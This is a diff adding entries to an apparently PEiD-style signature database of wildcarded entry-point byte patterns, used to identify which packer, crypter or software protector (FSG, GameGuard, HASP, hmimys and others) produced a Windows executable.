+signature = F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / ASM)]
+signature = F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 CE 10 C1 F6 0F 68 00 ?? ?? 00 2B FA 5B 23 F9 8D 15 80 ?? ?? 00 E8 01 00 00 00 B6 5E 0B
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = D1 E9 03 C0 68 80 ?? ?? 00 EB 02 CD 20 5E 40 BB F4 00 00 00 33 CA 2B C7 0F B6 16 EB 01 3E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 02 AB 35 EB 02 B5 C6 8D 05 80 ?? ?? 00 C1 C2 11 BE F4 00 00 00 F7 DB F7 DB 0F BE 38 E8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? ?? BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.2]
+signature = 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3
+ep_only = true
+
+[FSG v1.3]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00
+ep_only = true
+
+[FSG v1.31]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9
+ep_only = true
+
+[FSG v1.31 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB
+ep_only = true
+
+[FSG v1.33]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D
+ep_only = true
+
+[FSG v2.0]
+signature = 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75
+ep_only = false
+
+[FSG v2.0 -> bart/xt]
+signature = 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13
+ep_only = true
+
+[Fuck'n'Joy v1.0c -> UsAr]
+signature = 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00
+ep_only = true
+
+[Fuck'n'Joy v1.0c -> UsAr]
+signature = 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 00 0B C0 0F 84 EC 00 00 00 89 85 4D 08 40 00 8D 85 51 08 40 00 50 FF B5 6C 08 40 00 E8 AF 02 00 00 0B C0 0F 84 CC 00 00 00 89 85 5C 08 40 00 8D 85 67 07 40 00 E8 7B 02 00 00 8D B5 C4 07 40 00 56 6A 64 FF 95 74 07 40 00 46 80 3E 00 75 FA C7 06 74 6D 70 2E 83 C6 04 C7 06 65 78 65 00 8D 85 36 07 40 00 E8 4C 02 00 00 33 DB 53 53 6A 02 53 53 68 00 00 00 40 8D 85 C4 07 40 00 50 FF 95 74 07 40 00 89 85 78 07 40 00 8D 85 51 07 40 00 E8 21 02 00 00 6A 00 8D 85 7C 07 40 00 50 68 00 ?? ?? 00 8D 85 F2 09 40 00 50 FF
+ep_only = true
+
+[Fusion 1.0 -> jaNooNi]
+signature = 68 04 30 40 00 68 04 30 40 00 E8 09 03 00 00 68 04 30 40 00 E8 C7 02 00 00
+ep_only = true
+
+[GameGuard - nProtect]
+signature = 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE ?? ?? ?? ?? 31 FF 74 06 61 E9 4A 4D 50 30 8D BE ?? ?? ?? ?? 31 C9 74 06 61 E9 4A 4D 50 30 B8 7D 00 00 00 39 C2 B8 4C 00 00 00 F7 D0 75 3F 64 A1 30 00 00 00 85 C0 78 23 8B 40 0C 8B 40 0C C7 40 20 00 10 00 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 85 C0 75 16 E9 12 00 00 00 31 C0 64 A0 20 00 00 00 85 C0 75 05 E9 01 00 00 00 61 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07
+ep_only = true
+
+[GameGuard v2006.5.x.x (*.dll) -> sign by hot_UNP]
+signature = 31 FF 74 06 61 E9 4A 4D 50 30 BA 4C 00 00 00 80 7C 24 08 01 0F 85 ?? 01 00 00 60 BE 00
+ep_only = true
+
+[GameGuard v2006.5.x.x (*.exe) -> sign by hot_UNP]
+signature = 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE 00
+ep_only = true
+
+[Gamehouse Media Protector Version Unknown]
+signature = 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Gardian Angel 1.0]
+signature = 06 8C C8 8E D8 8E C0 FC BF ?? ?? EB
+ep_only = true
+
+[GHF Protector (pack only) --> GPcH]
+signature = 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 61 B9 FC FF FF FF 8B 1C 08 89 99 ?? ?? ?? ?? E2 F5 90 90 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 01 D6 8B 46 0C 85 C0 0F 84 87 00 00 00 01 D0 89 C3 50 B8 ?? ?? ?? ?? FF 10 85 C0 75 08 53 B8 ?? ?? ?? ?? FF 10 89 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00 00 00 00 BA ?? ?? ?? ?? 8B 06 85 C0 75 03 8B 46 10 01 D0 03 05 ?? ?? ?? ?? 8B 18 8B 7E 10 01 D7 03 3D ?? ?? ?? ?? 85 DB 74 2B F7 C3 00 00 00 80 75 04 01 D3 43 43 81 E3 FF FF FF 0F 53 FF 35 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 89 07 83 05 ?? ?? ?? ?? 04 EB AE 83 C6 14 BA ?? ?? ?? ?? E9 6E FF FF FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 8B 15 ?? ?? ?? ?? 52 FF D0 61 BA ?? ?? ?? ?? FF E2 90 C3
+ep_only = true
+
+[GHF Protector (pack only) -> GPcH]
+signature = 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41
+ep_only = false
+
+[Goats Mutilator V1.6 -> Goat/_e0f]
+signature = E8 EA 0B 00 00 ?? ?? ?? 8B 1C 79 F6 63 D8 8D 22 B0 BF F6 49 08 C3 02 BD 3B 6C 29 46 13 28 5D
+ep_only = true
+
+[GP-Install v5.0.3.32]
+signature = 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 B8 C4 1C 41 00 E8 6B 3E FF FF 33 C0 55 68 76 20 41 00 64 FF 30 64 89 20 BA A0 47 41 00 33 C0 E8 31 0A FF FF 33 D2 A1 A0
+ep_only = false
+
+[HACKSTOP v1.00]
+signature = FA BD ?? ?? FF E5 6A 49 48 0C ?? E4 ?? 3F 98 3F
+ep_only = true
+
+[HACKSTOP v1.10, v1.11]
+signature = B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 2F CD 21 B0 ?? B4 4C CD 21 50 B8 ?? ?? 58 EB
+ep_only = true
+
+[HACKSTOP v1.10p1]
+signature = B4 30 CD 21 86 E0 3D 00 03 73 ?? B4 2F CD 21 B4 2A CD 21 B4 2C CD 21 B0 FF B4 4C CD 21 50 B8 ?? ?? 58 EB
+ep_only = true
+
+[HACKSTOP v1.11c]
+signature = B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 ?? CD 21 B0 ?? B4 4C CD 21 53 BB ?? ?? 5B EB
+ep_only = true
+
+[HACKSTOP v1.13]
+signature = 52 B8 ?? ?? 1E CD 21 86 E0 3D ?? ?? 73 ?? CD 20 0E 1F B4 09 E8 ?? ?? 24 ?? EA
+ep_only = true
+
+[HACKSTOP v1.18]
+signature = 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? FD 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB
+ep_only = true
+
+[HACKSTOP v1.19]
+signature = 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? D6 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB
+ep_only = true
+
+[Hardlock dongle (Alladin)]
+signature = 5C 5C 2E 5C 48 41 52 44 4C 4F 43 4B 2E 56 58 44 00 00 00 00 5C 5C 2E 5C 46 45 6E 74 65 44 65 76
+ep_only = true
+
+[Hasp dongle (Alladin)]
+signature = 50 53 51 52 57 56 8B 75 1C 8B 3E ?? ?? ?? ?? ?? 8B 5D 08 8A FB ?? ?? 03 5D 10 8B 45 0C 8B 4D 14 8B 55 18 80 FF 32
+ep_only = true
+
+[HASP HL Protection V1.X -> Aladdin]
+signature = 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[HASP HL Protection V1.X -> Aladdin]
+signature = 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 15
+ep_only = true
+
+[HEALTH v.5.1 by Muslim M.Polyak]
+signature = 1E E8 ?? ?? 2E 8C 06 ?? ?? 2E 89 3E ?? ?? 8B D7 B8 ?? ?? CD 21 8B D8 0E 1F E8 ?? ?? 06 57 A1 ?? ?? 26
+ep_only = true
+
+[Hide PE 1.01 -> BGCorp]
+signature = ?? BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D
+ep_only = true
+
+[hmimys Protect v1.0]
+signature = E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9
+ep_only = true
+
+[hmimys Protect v1.0]
+signature = E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 00 00 00
+ep_only = false
+
+[hmimys's PE-Pack 0.1 -> hmimys]
+signature = E8 00 00 00 00 5D 83 ED 05 6A 00 FF 95 E1 0E 00 00 89 85 85 0E 00 00 8B 58 3C 03 D8 81 C3 F8 00 00 00 80 AD 89 0E 00 00 01 89 9D 63 0F 00 00 8B 4B 0C 03 8D 85 0E 00 00 8B 53 08 80 BD 89 0E 00 00 00 75 0C 03 8D 91 0E 00 00 2B 95 91 0E 00 00 89 8D 57 0F 00 00 89 95 5B 0F 00 00 8B 5B 10 89 9D 5F 0F 00 00 8B 9D 5F 0F 00 00 8B 85 57 0F 00 00 53 50 E8 B7 0B 00 00 89 85 73 0F 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 95 E9 0E 00 00 89 85 6B 0F 00 00 6A 04 68 00 10 00 00 68 D8 7C 00 00 6A 00 FF 95 E9 0E 00 00 89 85 6F 0F 00 00 8D 85 67 0F 00 00 8B 9D 73 0F 00 00 8B 8D 6B 0F 00 00 8B 95 5B 0F 00 00 83 EA 0E 8B B5 57 0F 00 00 83 C6 0E 8B BD 6F 0F 00 00 50 53 51 52 56 68 D8 7C 00 00 57 E8 01 01 00 00 8B 9D 57 0F 00 00 8B 03 3C 01 75
+ep_only = true
+
+[hmimys-Packer 1.0 -> hmimys]
+signature = 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07
+ep_only = false
+
+[hmimys-Packer V1.2 -> hmimys]
+signature = E8 95 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 5E AD 50 AD 50 97 AD 50 AD 50 AD 50 E8 C0 01 00 00 AD 50 AD 93 87 DE B9 ?? ?? ?? ?? E3 1D 8A 07 47 04 ?? 3C ?? 73 F7 8B 07 3C ?? 75 F3 B0 00 0F C8 05 ?? ?? ?? ?? 2B C7 AB E2 E3 AD 85 C0 74 2B 97 56 FF 13 8B E8 AC 84 C0 75 FB 66 AD 66 85 C0 74 E9 AC 83 EE 03 84 C0 74 08 56 55 FF 53 04 AB EB E4 AD 50 55 FF 53 04 AB EB E0 C3 8B 0A 3B 4A 04 75 0A C7 42 10 01 00 00 00 0C FF C3
+ep_only = true
+
+[HPA]
+signature = E8 ?? ?? 5E 8B D6 83 ?? ?? 83 ?? ?? 06 0E 1E 0E 1F 33 FF 8C D3
+ep_only = true
+
+[Hying's PE-Armor 0.75.exe -> Hying [CCG]]
+signature = 00 00 00 00 00 00 00 00 ?? ?? 00 00 00 00 00 00 ?? ?? 01 00 00 00 00 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 74 ?? ?? ?? 00 00 00 00 00
+ep_only = false
+
+[hying's PEArmor V0.76 -> hying]
+signature = E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A ?? E8 A3 00 00 00
+ep_only = true
+
+[ICrypt 1.0 - by BuGGz]
+signature = 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 70 3B 00 10 E8 3C FA FF FF 33 C0 55 68 6C 3C 00 10 64 FF 30 64 89 20 6A 0A 68 7C 3C 00 10 A1 50 56 00 10 50 E8 D8 FA FF FF 8B D8 53 A1 50 56 00 10 50 E8 0A FB FF FF 8B F8 53 A1 50 56 00 10 50 E8 D4 FA FF FF 8B D8 53 E8 D4 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 64 56 00 10 E8 25 F6 FF FF B8 64 56 00 10 E8 13 F6 FF FF 8B CF 8B D6 E8 E6 FA FF FF 53 E8 90 FA FF FF 8D 4D EC BA 8C 3C 00 10 A1 64 56 00 10 E8 16 FB FF FF 8B 55 EC B8 64 56 00 10 E8 C5 F4 FF FF B8 64 56 00 10 E8 DB F5 FF FF E8 56 FC FF FF 33 C0 5A 59 59 64 89 10 68 73 3C 00 10 8D 45 EC E8 4D F4 FF FF C3 E9 E3 EE FF FF EB F0 5F 5E 5B E8 4D F3 FF FF 00 53 45 54 ?? ?? ?? ?? 00 FF FF FF FF 08 00 00 00 76 6F 74 72 65 63 6C 65
+ep_only = true
+
+[ID Application Protector 1.2 -> ID Security Suite]
+signature = 60 E8 00 00 00 00 5D 81 ED F2 0B 47 00 B9 19 22 47 00 81 E9 EA 0E 47 00 89 EA 81 C2 EA 0E 47 00 8D 3A 89 FE 31 C0 E9 D3 02 00 00 CC CC CC CC E9 CA 02 00 00 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 6F 66 74 57 61 72 65 50 72 6F 74 65 63 74 6F 72 5C
+ep_only = true
+
+[ILUCRYPT v4.015 [exe]]
+signature = 8B EC FA C7 46 F7 ?? ?? 42 81 FA ?? ?? 75 F9 FF 66 F7
+ep_only = true
+
+[iLUCRYPT v4.018 [exe]]
+signature = 8B EC FA C7 ?? ?? ?? ?? 4C 4C C3 FB BF ?? ?? B8 ?? ?? 2E ?? ?? D1 C8 4F 81
+ep_only = true
+
+[IMP-Packer 1.0 -> Mahdi Hezavehi [IMPOSTER]]
+signature = 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63
+ep_only = false
+
+[Imploder v1.04 --> BoB / BobSoft]
+signature = 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44
+ep_only = true
+
+[IMPostor Pack 1.0 -> Mahdi Hezavehi]
+signature = BE ?? ?? ?? 00 83 C6 01 FF E6 00 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? 02 ?? ?? 00 10 00 00 00 02 00
+ep_only = true
+
+[Inbuild v1.0 [hard]]
+signature = B9 ?? ?? BB ?? ?? 2E ?? ?? 2E ?? ?? 43 E2
+ep_only = true
+
